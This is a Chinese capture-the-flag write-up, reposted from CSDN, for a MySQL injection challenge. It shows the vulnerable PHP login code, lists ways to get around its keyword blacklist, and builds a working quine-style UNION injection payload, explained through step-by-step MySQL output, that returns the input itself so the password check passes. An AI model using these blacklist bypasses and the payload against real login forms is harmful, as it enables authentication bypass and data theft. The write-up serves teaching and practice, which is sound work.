• CTFHub_2021第五空间智能安全大赛Webyet_another_mysql_injection(quine注入)


    转载自:https://blog.csdn.net/m0_53065491/article/details/122478401

    进入场景,是个登录框

    f12找到提示,拿到源码

    源代码如下

     <?php
    include_once("lib.php");
    function alertMes($mes,$url){
        die("<script>alert('{$mes}');location.href='{$url}';</script>");
    }
    
    function checkSql($s) {
        if(preg_match("/regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|extractvalue|floor|substr|&|;|\\\$|0x|sleep|\ /i",$s)){
            alertMes('hacker', 'index.php');
        }
    }
    
    if (isset($_POST['username']) && $_POST['username'] != '' && isset($_POST['password']) && $_POST['password'] != '') {
        $username=$_POST['username'];
        $password=$_POST['password'];
        if ($username !== 'admin') {
            alertMes('only admin can login', 'index.php');//username===admin
        }
        checkSql($password);
        $sql="SELECT password FROM users WHERE username='admin' and password='$password';";
        $user_result=mysqli_query($con,$sql);
        $row = mysqli_fetch_array($user_result);
        if (!$row) {
            alertMes("something wrong",'index.php');
        }
        if ($row['password'] === $password) {//这个是关键
        die($FLAG);
        } else {
        alertMes("wrong password",'index.php');
      }
    }
    
    if(isset($_GET['source'])){
      show_source(__FILE__);
      die;
    }
    ?>
    

    经过分析源代码发现只有password字段可控,并且对password字段使用正则表达式做了关键字的过滤

    function checkSql($s) {
        if(preg_match("/regexp|between|in|flag|=|<|and|\||right|left|reverse|update|extractvalue|floor|substr|&|;|\\\$|0x|sleep|\ /i",$s)){
            alertMes('hacker', 'index.php');
        }
    }
    

    看到这里心想着虽然过滤了sleep,>,<,substr这些盲注经常用到的函数和符号。但只要是黑名单,就存在被绕过的风险

    sleep 可以用benchmark代替
     
    <,> 可以用least(),greatest()代替
     
    =,in 可以用like代替
     
    substr 可以用mid代替
    
    空格 可以用/**/代替

    要是盲注就好办了,直接上sqlmap。但是接着往下看就会发现这么一段很关键的代码

    if ($row['password'] === $password) {
        die($FLAG);
        } else {
        alertMes("wrong password",'index.php');
    

    这个if判断了从数据库中查到的密码是否和用户输入的是一样的,只有完全一致才会得到FLAG,那这岂不是只能输入正确密码才能得到FLAG???

    进入正题

    通过分析发现只有输入正确的密码才能得到FLAG,但是这张表其实是一张空表,所以爆破密码这条路走不通。

    那就只有一个办法,就是构造一个输入输出完全一致的语句,就可以绕过限制并得到FLAG

    注入的payload

    1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#

    看到这里是不是一脸懵逼,别着急,慢慢分析

    1.首先先了解一下replace()函数

    • replace(object,search,replace)
    • 把object对象中出现的的search全部替换成replace

    看个例子

    select replace(".",char(46),".");# char(46)就是.
    +---------------------------+
    | replace(".",char(46),".") |
    +---------------------------+
    | .                         |
    +---------------------------+
    

    2.如何让输入输出一致呢?

    上面的例子用.替换object里的.,最终返回了一个.,那如果我们将object写成replace(".",char(46),".")会有什么变化呢?

    mysql> select replace('replace(".",char(46),".")',char(46),'.');
    +---------------------------------------------------+
    | replace('replace(".",char(46),".")',char(46),'.') |
    +---------------------------------------------------+
    | replace(".",char(46),".")                         |
    +---------------------------------------------------+
    

    结果返回了replace(".",char(46),".")这个东西,但还是没有达到我们预期的效果怎么办,这时候我们将第三个参数也改成replace(".",char(46),".")

    mysql> select replace('replace(".",char(46),".")',char(46),'replace(".",char(46),".")');
    +---------------------------------------------------------------------------+
    | replace('replace(".",char(46),".")',char(46),'replace(".",char(46),".")') |
    +---------------------------------------------------------------------------+
    | replace("replace(".",char(46),".")",char(46),"replace(".",char(46),".")") |
    +---------------------------------------------------------------------------+
    

    有点类似套娃的感觉。先分析一下这段sql语句

    select replace('replace(".",char(46),".")',char(46),'replace(".",char(46),".")');
    
    replace函数的三个参数分别是
    
    'replace(".",char(46),".")'
    char(46)
    'replace(".",char(46),".")'
    
    这个语句的意思是用第三个参数替换第一个参数里面的.并返回替换后的第一个参数
    
    这样就明白了为什么返回的是replace("replace(".",char(46),".")",char(46),"replace(".",char(46),".")")

    那么这样是否就达到了我们输入输出一致的目的呢,答案肯定是还没有。细心点就会发现输入与输出在单双引号上有细微的不同

    3.解决单双引号不同的问题

    有了上面的经验后,我们这样考虑,如果先将双引号替换成单引号是不是就可以解决引号不同的问题了。实现方法无非就是在套一层replace

    mysql> select replace(replace('"."',char(34),char(39)),char(46),".");# 先执行内层replace
    +--------------------------------------------------------+
    | replace(replace('"."',char(34),char(39)),char(46),".") |
    +--------------------------------------------------------+
    | '.'                                                    |
    +--------------------------------------------------------+
    1 row in set (0.00 sec)
    

    这样就可以将我们的双引号替换成单引号,此时我们继续沿用上面的思路,构造输入输出相同的语句

    mysql> select replace(replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'replace(replace(".",char(34),char(39)),char(46),".")');
    +------------------------------------------------------------------------------------------------------------------------------------------------------------+
    | replace(replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'replace(replace(".",char(34),char(39)),char(46),".")') |
    +------------------------------------------------------------------------------------------------------------------------------------------------------------+
    | replace(replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'replace(replace(".",char(34),char(39)),char(46),".")') |
    +------------------------------------------------------------------------------------------------------------------------------------------------------------+
    1 row in set (0.00 sec)
    Quine基本形式:
    
    replace(replace(‘str’,char(34),char(39)),char(46),‘str’)
    
    先将str里的双引号替换成单引号,再用str替换str里的.
    
    str基本形式(可以理解成上面的".")
    
    replace(replace(".",char(34),char(39)),char(46),".")
    
    完整的Quine就是Quine基本形式+str基本形式

    回过头来再看我们的payload

    1'/**/union/**/select/**/replace(replace('',char(34),char(39)),char(46),'')#
    可理解成我们的Quine的基本形式
    1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#
    这个就是我们str的基本形式
    
    先将str里的双引号替换成单引号
    1'/**/union/**/select/**/replace(replace('.',char(34),char(39)),char(46),'.')#
    最终通过来回替换的形式达到了我们的目的

    现在就明白了为什么我们的内层replace里面有一个单独的''

    Quine形式多变,修改的时候切记str对应也要修改

  • 相关阅读:
    python 的class和def 定义执行语句相关
    python _和__ 下划线命名规则
    python2和python3编码问题【encode和decode】
    cpython源码阅读
    eCPRI
    python内存管理/垃圾回收
    Class() vs self.__class__()
    JAVA学习日报 11/24
    JAVA学习日报 11/23
    JAVA学习日报 11/22
  • 原文地址:https://www.cnblogs.com/zhengna/p/15917521.html
Copyright © 2020-2023  润新知